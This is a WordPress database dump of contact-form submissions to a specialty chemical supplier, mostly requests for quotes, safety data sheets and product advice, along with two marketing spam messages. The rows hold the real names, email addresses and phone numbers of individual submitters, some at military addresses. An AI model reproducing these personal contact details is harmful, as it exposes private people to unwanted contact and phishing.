INSERT INTO `wp_postmeta` VALUES (27653, 3236, '_field_8', '(973) 224-9599'); 
INSERT INTO `wp_postmeta` VALUES (27654, 3236, '_field_3', 'Representing Continental Aromatics, I would appreciate the opportunity to become a  vendor of MS.  CA has been in business for about 40 years providing excellent quality fragrance oils to many companies worldwide including cosmetic and industrial uses.  In addition to our great quality products, we can provide very attractive pricing and fantastic service to MS.\r\n\r\nI look forward your response on this message.\r\n\r\nTHANK YOU\r\n\r\nSINCERELY,\r\n\r\nMichael Zaccaria'); 
INSERT INTO `wp_postmeta` VALUES (27655, 3236, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27656, 3236, '_sub_id', '3236'); 
INSERT INTO `wp_postmeta` VALUES (27657, 3237, '_edit_lock', '1481313139:2'); 
INSERT INTO `wp_postmeta` VALUES (27658, 3237, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (27659, 3238, '_wp_attached_file', '2016/12/electrical-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (27660, 3238, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:548;s:6:"height";i:500;s:4:"file";s:29:"2016/12/electrical-grease.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"electrical-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"electrical-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"electrical-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"electrical-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"electrical-grease-510x500.jpg";s:5:"width";i:510;s:6:"height";i:500;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (27661, 3239, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27662, 3239, '_seq_num', '158'); 
INSERT INTO `wp_postmeta` VALUES (27663, 3239, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27664, 3239, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27665, 3239, '_field_1', 'Jennifer Gutierrez'); 
INSERT INTO `wp_postmeta` VALUES (27666, 3239, '_field_10', 'Equipos y Soldaduras RAFE'); 
INSERT INTO `wp_postmeta` VALUES (27667, 3239, '_field_2', 'jennifer.gutierrez@rafe.com.mx'); 
INSERT INTO `wp_postmeta` VALUES (27668, 3239, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27669, 3239, '_field_3', 'Hi, \r\n\r\nPlease, can you help me with any contact or distributor in Mexico to make a quote. \r\n\r\nis very urgent\r\nThank you '); 
INSERT INTO `wp_postmeta` VALUES (27670, 3239, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27671, 3239, '_sub_id', '3239'); 
INSERT INTO `wp_postmeta` VALUES (27673, 3237, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (27674, 3237, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (27675, 3237, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (27676, 3237, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (27677, 3237, '_yoast_wpseo_focuskw_text_input', 'Electrical Conducting Grease'); 
INSERT INTO `wp_postmeta` VALUES (27678, 3237, '_yoast_wpseo_focuskw', 'Electrical Conducting Grease'); 
INSERT INTO `wp_postmeta` VALUES (27679, 3237, '_yoast_wpseo_title', 'Krytox Performance Lubricants | Electrical Conducting Grease'); 
INSERT INTO `wp_postmeta` VALUES (27680, 3237, '_yoast_wpseo_metadesc', 'Krytox™ perfluoropolyether (PFPE) oils with no additives are good insulators. The typical dielectric properties are shown in the table.'); 
INSERT INTO `wp_postmeta` VALUES (27681, 3237, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (27682, 3237, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (27683, 3237, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (27684, 3241, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27685, 3241, '_seq_num', '159'); 
INSERT INTO `wp_postmeta` VALUES (27686, 3241, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27687, 3241, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27688, 3241, '_field_1', 'Stephen smith'); 
INSERT INTO `wp_postmeta` VALUES (27689, 3241, '_field_10', 'accel manufacturing inc.'); 
INSERT INTO `wp_postmeta` VALUES (27690, 3241, '_field_2', 'stephens@accelmfg.com'); 
INSERT INTO `wp_postmeta` VALUES (27691, 3241, '_field_8', '(408) 727-5883'); 
INSERT INTO `wp_postmeta` VALUES (27692, 3241, '_field_3', 'Dear Sir or Ma&#039;am,\r\n\r\nAccel is currently working on getting ISO 13485 certification and as a vendor of ours we would like to put your certificate on file.  Would please forward me a link to the ISO/TS or other relevant cert for your company for our files.\r\n\r\nThank You,\r\nStephen\r\n'); 
INSERT INTO `wp_postmeta` VALUES (27693, 3241, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27694, 3241, '_sub_id', '3241'); 
INSERT INTO `wp_postmeta` VALUES (27695, 3242, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27696, 3242, '_seq_num', '160'); 
INSERT INTO `wp_postmeta` VALUES (27697, 3242, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27698, 3242, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27699, 3242, '_field_1', 'george McDaniel'); 
INSERT INTO `wp_postmeta` VALUES (27700, 3242, '_field_10', 'NSWC IHEODTD'); 
INSERT INTO `wp_postmeta` VALUES (27701, 3242, '_field_2', 'george.w.mcdaniel@navy.mil'); 
INSERT INTO `wp_postmeta` VALUES (27702, 3242, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27703, 3242, '_field_3', 'I would like to get a quote for Krytox GPL 203 grease in different quantities from the 2 OZ tube to the 5kg.\n\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (27704, 3242, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27705, 3242, '_sub_id', '3242'); 
INSERT INTO `wp_postmeta` VALUES (27706, 3243, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27707, 3243, '_seq_num', '161'); 
INSERT INTO `wp_postmeta` VALUES (27708, 3243, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27709, 3243, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27710, 3243, '_field_1', 'Alexander '); 
INSERT INTO `wp_postmeta` VALUES (27711, 3243, '_field_10', 'RuSky Group'); 
INSERT INTO `wp_postmeta` VALUES (27712, 3243, '_field_2', 'ar@itrusky.ru'); 
INSERT INTO `wp_postmeta` VALUES (27713, 3243, '_field_8', '(929) 913-9737'); 
INSERT INTO `wp_postmeta` VALUES (27714, 3243, '_field_3', 'Good day,\r\nDear Sir/Madam,\r\n\r\nCould you please advise under what specification a p/n MS-122AD Release agent,  is qualified? \r\n\r\nMany thanks in advance. \r\nAlexander \r\n'); 
INSERT INTO `wp_postmeta` VALUES (27715, 3243, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27716, 3243, '_sub_id', '3243'); 
INSERT INTO `wp_postmeta` VALUES (27717, 3244, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27718, 3244, '_seq_num', '162'); 
INSERT INTO `wp_postmeta` VALUES (27719, 3244, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27720, 3244, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27721, 3244, '_field_1', 'Max Venters'); 
INSERT INTO `wp_postmeta` VALUES (27722, 3244, '_field_10', 'Gill'); 
INSERT INTO `wp_postmeta` VALUES (27723, 3244, '_field_2', 'max.venters@gillrd.com'); 
INSERT INTO `wp_postmeta` VALUES (27724, 3244, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27725, 3244, '_field_3', 'Hi there, \r\nI am currently looking for a conformal/epoxy coating that can be used in a dip coating process. It would need to have an operating temperature from -40 to +125 deg celsius and be able to withstand a short dwell of a couple of seconds at 250 deg C in an over molding process. It would also need to be resistant to salt spray and oils/petrols. If you have any info or suitable products that would be fantastic.'); 
INSERT INTO `wp_postmeta` VALUES (27726, 3244, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27727, 3244, '_sub_id', '3244'); 
INSERT INTO `wp_postmeta` VALUES (27728, 3246, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27729, 3246, '_seq_num', '163'); 
INSERT INTO `wp_postmeta` VALUES (27730, 3246, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27731, 3246, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27732, 3246, '_field_1', 'Joe Burck'); 
INSERT INTO `wp_postmeta` VALUES (27733, 3246, '_field_10', 'Integer'); 
INSERT INTO `wp_postmeta` VALUES (27734, 3246, '_field_2', 'joe.burck@lakeregionmedical.com'); 
INSERT INTO `wp_postmeta` VALUES (27735, 3246, '_field_8', '(847) 325-9649'); 
INSERT INTO `wp_postmeta` VALUES (27736, 3246, '_field_3', 'I would like to be provided a contact to assist me in getting a quote for Teflon Coating. The specification I have received has Miller-Stephenson on the document. The specification number is 3011143 Rev A that I can provide along with drawings. '); 
INSERT INTO `wp_postmeta` VALUES (27737, 3246, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27738, 3246, '_sub_id', '3246'); 
INSERT INTO `wp_postmeta` VALUES (27739, 3247, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27740, 3247, '_seq_num', '179'); 
INSERT INTO `wp_postmeta` VALUES (27741, 3247, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27742, 3247, '_field_12', 'Paige Nowell'); 
INSERT INTO `wp_postmeta` VALUES (27743, 3247, '_field_13', 'PPG Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (27744, 3247, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (27745, 3247, '_field_14', 'pnowell@ppg.com'); 
INSERT INTO `wp_postmeta` VALUES (27746, 3247, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (27747, 3247, '_field_16', 'Can you please provide the VOC for MS-122XD Aerosol?'); 
INSERT INTO `wp_postmeta` VALUES (27748, 3247, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27749, 3247, '_sub_id', '3247'); 
INSERT INTO `wp_postmeta` VALUES (27750, 3248, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27751, 3248, '_seq_num', '164'); 
INSERT INTO `wp_postmeta` VALUES (27752, 3248, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27753, 3248, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27754, 3248, '_field_1', 'LEAH GRIFFITH'); 
INSERT INTO `wp_postmeta` VALUES (27755, 3248, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (27756, 3248, '_field_2', 'leah.t.griffith.ctr@mail.mil'); 
INSERT INTO `wp_postmeta` VALUES (27757, 3248, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27758, 3248, '_field_3', 'I work for AECOM-HazMart. Our company tracks the chemical materials on a government installation located at White Sands Missile Range, NM. We are trying to update our product database and I am hoping that you can give me the shelf life of the following products: MS-730M; MS-143XD; MS-143H\n\nThank you very much for your help!'); 
INSERT INTO `wp_postmeta` VALUES (27759, 3248, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27760, 3248, '_sub_id', '3248'); 
INSERT INTO `wp_postmeta` VALUES (27761, 3249, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27762, 3249, '_seq_num', '165'); 
INSERT INTO `wp_postmeta` VALUES (27763, 3249, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27764, 3249, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27765, 3249, '_field_1', 'Lori Goehring'); 
INSERT INTO `wp_postmeta` VALUES (27766, 3249, '_field_10', 'Controlled Environment Products, Inc. '); 
INSERT INTO `wp_postmeta` VALUES (27767, 3249, '_field_2', 'l.goehring@netcep.com'); 
INSERT INTO `wp_postmeta` VALUES (27768, 3249, '_field_8', '(816) 453-8900'); 
INSERT INTO `wp_postmeta` VALUES (27769, 3249, '_field_3', 'I am looking to get our pricing information for 2017 so that I can notify our customers please ?'); 
INSERT INTO `wp_postmeta` VALUES (27770, 3249, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27771, 3249, '_sub_id', '3249'); 
INSERT INTO `wp_postmeta` VALUES (27772, 3250, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27773, 3250, '_seq_num', '166'); 
INSERT INTO `wp_postmeta` VALUES (27774, 3250, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27775, 3250, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27776, 3250, '_field_1', 'Kevin Daniels'); 
INSERT INTO `wp_postmeta` VALUES (27777, 3250, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (27778, 3250, '_field_2', 'kevin@sublimedata.us'); 
INSERT INTO `wp_postmeta` VALUES (27779, 3250, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27780, 3250, '_field_3', 'Hi,\r\n\r\nI wanted to reach you out and check whether you need updated database of Electric vehicle industry and many more according to your need.\r\n\r\nWe are B2B contact provider. Would you be interested in reaching out to contacts interested in your services? This is the last and festive month of year and best time to get list as we are offering big discount offers.\r\n\r\nWe have the complete contact details of Engineers, CEO/President, Founders, Senior Manager, Marketing Manager, Business Development Manager, Consultant, Distributors, Retailers, CTO/Technical Head and many more from industries like Automotive, R&amp;D, Material Suppliers, Manufacturers, Design &amp; Simulation, Education, Stations, Power Management, Component Suppliers and many more.\r\n\r\nKindly let me know your target criteria:\r\n\r\nTarget Industry :\r\nTarget Geography :\r\nTarget Job Title :\r\n\r\nPlease let us know if you have any specific target audience so that I can provide you with the counts and free samples.\r\n\r\nBest Regards,\r\nKevin Daniels\r\nMarketing Manager\r\n'); 
INSERT INTO `wp_postmeta` VALUES (27781, 3250, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27782, 3250, '_sub_id', '3250'); 
INSERT INTO `wp_postmeta` VALUES (27783, 3251, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27784, 3251, '_seq_num', '180'); 
INSERT INTO `wp_postmeta` VALUES (27785, 3251, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27786, 3251, '_field_12', 'Mike Van'); 
INSERT INTO `wp_postmeta` VALUES (27787, 3251, '_field_13', 'EMS Grand Rapids'); 
INSERT INTO `wp_postmeta` VALUES (27788, 3251, '_field_18', 'Not a customer'); 
INSERT INTO `wp_postmeta` VALUES (27789, 3251, '_field_14', 'Mike@emsgrandrapids.com'); 
INSERT INTO `wp_postmeta` VALUES (27790, 3251, '_field_15', '(616) 822-5901'); 
INSERT INTO `wp_postmeta` VALUES (27791, 3251, '_field_16', 'We are looking for a release agent for several applications.\r\nFirst to be applied to large fad blades at are accumulating a Lacquer like substance.\r\nNext Powered milk accumulating again on a fan surface.\r\nLeast but not last. \r\n'); 
INSERT INTO `wp_postmeta` VALUES (27792, 3251, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (27793, 3251, '_sub_id', '3251'); 
INSERT INTO `wp_postmeta` VALUES (27794, 3252, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27795, 3252, '_seq_num', '167'); 
INSERT INTO `wp_postmeta` VALUES (27796, 3252, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27797, 3252, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27798, 3252, '_field_1', 'Hamid Habibi'); 
INSERT INTO `wp_postmeta` VALUES (27799, 3252, '_field_10', 'Magna Mirrors'); 
INSERT INTO `wp_postmeta` VALUES (27800, 3252, '_field_2', 'hamid.habibi@magna.com'); 
INSERT INTO `wp_postmeta` VALUES (27801, 3252, '_field_8', '(616) 786-5191'); 
INSERT INTO `wp_postmeta` VALUES (27802, 3252, '_field_3', 'We have an application where we would like to protect a thin silver coating on glass. The finished part would have to pass salt spray, CASS, high heat/high humidity and thermal shock.\n\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (27803, 3252, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27804, 3252, '_sub_id', '3252'); 
INSERT INTO `wp_postmeta` VALUES (27805, 3253, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27806, 3253, '_seq_num', '168'); 
INSERT INTO `wp_postmeta` VALUES (27807, 3253, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27808, 3253, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27809, 3253, '_field_1', 'Emy Ma'); 
INSERT INTO `wp_postmeta` VALUES (27810, 3253, '_field_10', 'Shanghai Avontus International Trade co.Ltd.'); 
INSERT INTO `wp_postmeta` VALUES (27811, 3253, '_field_2', 'sales@avontus.cn'); 
INSERT INTO `wp_postmeta` VALUES (27812, 3253, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27813, 3253, '_field_3', 'we need GLP 225 20kg /pail  and AUT 2245 1kg .could you give me a quotation. if you have good price we will order to you soon. and it will be a long term business.\r\nI looking forward to hearing from you soon.\r\nbest regards\r\nEmy Ma\r\nShanghai Avontus International Trade co.ltd.\r\nTel:86-21-54867601,FAX:86-21-54767603\r\nHomepage:www.avontus.cn\r\nNo.22 Alley 8988 Zhongchun Rd Shanghai China\r\n'); 
INSERT INTO `wp_postmeta` VALUES (27814, 3253, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27815, 3253, '_sub_id', '3253'); 
INSERT INTO `wp_postmeta` VALUES (27816, 3254, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27817, 3254, '_seq_num', '169'); 
INSERT INTO `wp_postmeta` VALUES (27818, 3254, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27819, 3254, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27820, 3254, '_field_1', 'Beka Leffler'); 
INSERT INTO `wp_postmeta` VALUES (27821, 3254, '_field_10', 'Earth Memorials'); 
INSERT INTO `wp_postmeta` VALUES (27822, 3254, '_field_2', 'support@earth-memorials.com'); 
INSERT INTO `wp_postmeta` VALUES (27823, 3254, '_field_8', '(208) 852-2495'); 
INSERT INTO `wp_postmeta` VALUES (27824, 3254, '_field_3', 'I need an aroesal spray to spray my fiberglass mold.  Then  I put something wet with water in the mold and I don&#039;t want it to stick.  Most important, it can&#039;t be yellow.  I am putting white paper in these mold and it has to stay white.  Do you have anything that would work?'); 
INSERT INTO `wp_postmeta` VALUES (27825, 3254, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27826, 3254, '_sub_id', '3254'); 
INSERT INTO `wp_postmeta` VALUES (27827, 3255, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27828, 3255, '_seq_num', '170'); 
INSERT INTO `wp_postmeta` VALUES (27829, 3255, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27830, 3255, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27831, 3255, '_field_1', 'Yaprianto Herman'); 
INSERT INTO `wp_postmeta` VALUES (27832, 3255, '_field_10', 'Textron Aviation'); 
INSERT INTO `wp_postmeta` VALUES (27833, 3255, '_field_2', 'yherman01@txtav.com'); 
INSERT INTO `wp_postmeta` VALUES (27834, 3255, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27835, 3255, '_field_3', 'Can we get a sample of MS-470S Urethane Conformal Coating in aerosol form for testing purposes. Please contact me for address confirmation. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (27836, 3255, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27837, 3255, '_sub_id', '3255'); 
INSERT INTO `wp_postmeta` VALUES (27838, 3256, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27839, 3256, '_seq_num', '171'); 
INSERT INTO `wp_postmeta` VALUES (27840, 3256, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27841, 3256, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27842, 3256, '_field_1', 'Natividad Owens'); 
INSERT INTO `wp_postmeta` VALUES (27843, 3256, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (27844, 3256, '_field_2', 'NatividadROwens@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (27845, 3256, '_field_8', '(877) 228-1545'); 
INSERT INTO `wp_postmeta` VALUES (27846, 3256, '_field_3', 'Hi,\r\n \r\nFrom what I can tell, you are doing a lot of great marketing, but around 98 per cent of leads to your website are leaving without taking any action on your site. I can show you how, through reverse IP lookup, we can identify the companies and individuals visiting your site. I can also provide you with the contact info - including names, emails and phone numbers - of these visitors, effectively doubling or tripling the number of leads that can be harvested from your existing web traffic.\r\n \r\nMy team has over twelve years of experience driving results for our clients, and we want you to be a part of their long reputation for success. We&#039;re based in Los Angeles, we&#039;re Google partners, and we&#039;ve received accolades from Inc Magazine and the LA Business Journal. \r\n \r\nIs there a time this week that works best to set up a call?\r\n\r\nBest,\r\n\r\nNatividad R. Owens\r\nDigital Marketing Manager\r\n(877) 228-1545\r\nhttps://www.smartertactics.com'); 
INSERT INTO `wp_postmeta` VALUES (27847, 3256, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27848, 3256, '_sub_id', '3256'); 
INSERT INTO `wp_postmeta` VALUES (27849, 3257, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27850, 3257, '_seq_num', '172'); 
INSERT INTO `wp_postmeta` VALUES (27851, 3257, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27852, 3257, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27853, 3257, '_field_1', 'SHANE CHAMPAGNE'); 
INSERT INTO `wp_postmeta` VALUES (27854, 3257, '_field_10', 'US NAVY'); 
INSERT INTO `wp_postmeta` VALUES (27855, 3257, '_field_2', 'SHANE.CHAMPAGNE@NAVY.MIL'); 
INSERT INTO `wp_postmeta` VALUES (27856, 3257, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27857, 3257, '_field_3', 'REQUEST AN SDS FOR EPIKURE 3282 AND EPON RESIN 828.'); 
INSERT INTO `wp_postmeta` VALUES (27858, 3257, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27859, 3257, '_sub_id', '3257'); 
INSERT INTO `wp_postmeta` VALUES (27860, 3258, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27861, 3258, '_seq_num', '173'); 
INSERT INTO `wp_postmeta` VALUES (27862, 3258, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27863, 3258, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27864, 3258, '_field_1', 'Donna Schoeckert'); 
INSERT INTO `wp_postmeta` VALUES (27865, 3258, '_field_10', 'Ellsworth Adhesives'); 
INSERT INTO `wp_postmeta` VALUES (27866, 3258, '_field_2', 'sds@ellsworth.com'); 
INSERT INTO `wp_postmeta` VALUES (27867, 3258, '_field_8', '(262) 509-8796'); 
INSERT INTO `wp_postmeta` VALUES (27868, 3258, '_field_3', 'can you please send TDS for MS-122E?'); 
INSERT INTO `wp_postmeta` VALUES (27869, 3258, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27870, 3258, '_sub_id', '3258'); 
INSERT INTO `wp_postmeta` VALUES (27871, 3259, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27872, 3259, '_seq_num', '174'); 
INSERT INTO `wp_postmeta` VALUES (27873, 3259, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27874, 3259, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27875, 3259, '_field_1', 'Criss Norman'); 
INSERT INTO `wp_postmeta` VALUES (27876, 3259, '_field_10', 'MSDSonline'); 
INSERT INTO `wp_postmeta` VALUES (27877, 3259, '_field_2', 'cnorman@ehs.com'); 
INSERT INTO `wp_postmeta` VALUES (27878, 3259, '_field_8', '(914) 574-8035'); 
INSERT INTO `wp_postmeta` VALUES (27879, 3259, '_field_3', 'Request for GHS/ANSI-OSHA compliant [M]SDS (Batch : B4560, Project_ID : RP_169)\r\n\r\nHello,\r\n\r\nI am looking to obtain the latest GHS/ANSI-OSHA complaint [M]SDS on behalf of a mutual client, Revere Plastics Systems Group LLC, which I was not able to locate on your website.\r\n\r\nThe product is:\r\n\r\n1) Product_Name: Krytox MS-1205 (COUNTED IN OZ.  14 OZ PER CAN)\r\n   Product Code: Not Available\r\n\r\nRevere Plastics Systems Group LLC is a US client and would prefer an GHS/ANSI-OSHA compliant [M]SDS if available. If not, we gladly accept the regulatory format your [M]SDS come in. For your records please see the attached authorization letter from Revere Plastics Systems Group LLC.\r\n\r\nPlease email pdf versions of the [M]SDS to cnorman@ehs.com and if you could mention our Reference Number B4560 in the subject line that would be appreciated. If the product is not hazardous and does not require [M]SDS, could you please email us an Exempt Letter indicating the same? \r\n\r\nIf you require any additional information, please do not hesitate to ask. Thank you for your time.\r\n\r\n\r\nRegards,\r\nCriss Norman.'); 
INSERT INTO `wp_postmeta` VALUES (27880, 3259, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27881, 3259, '_sub_id', '3259'); 
INSERT INTO `wp_postmeta` VALUES (27882, 3260, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27883, 3260, '_seq_num', '175'); 
INSERT INTO `wp_postmeta` VALUES (27884, 3260, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27885, 3260, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27886, 3260, '_field_1', 'Robert L. Gray'); 
INSERT INTO `wp_postmeta` VALUES (27887, 3260, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (27888, 3260, '_field_2', 'robertgray@fuse.net'); 
INSERT INTO `wp_postmeta` VALUES (27889, 3260, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27890, 3260, '_field_3', 'I have Epi-Cure 3140 Curing agent could you please tell me the epoxy it is to be use with. For metal (alum), wood, and plastic.\r\nAlso a place in Cincinnati, Ohio, where I could purchase the two parts.\r\nThank you, Robert.'); 
INSERT INTO `wp_postmeta` VALUES (27891, 3260, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27892, 3260, '_sub_id', '3260'); 
INSERT INTO `wp_postmeta` VALUES (27893, 3261, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27894, 3261, '_seq_num', '176'); 
INSERT INTO `wp_postmeta` VALUES (27895, 3261, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27896, 3261, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27897, 3261, '_field_1', 'Yolanda R. Gomez'); 
INSERT INTO `wp_postmeta` VALUES (27898, 3261, '_field_10', 'Lockheed Martin'); 
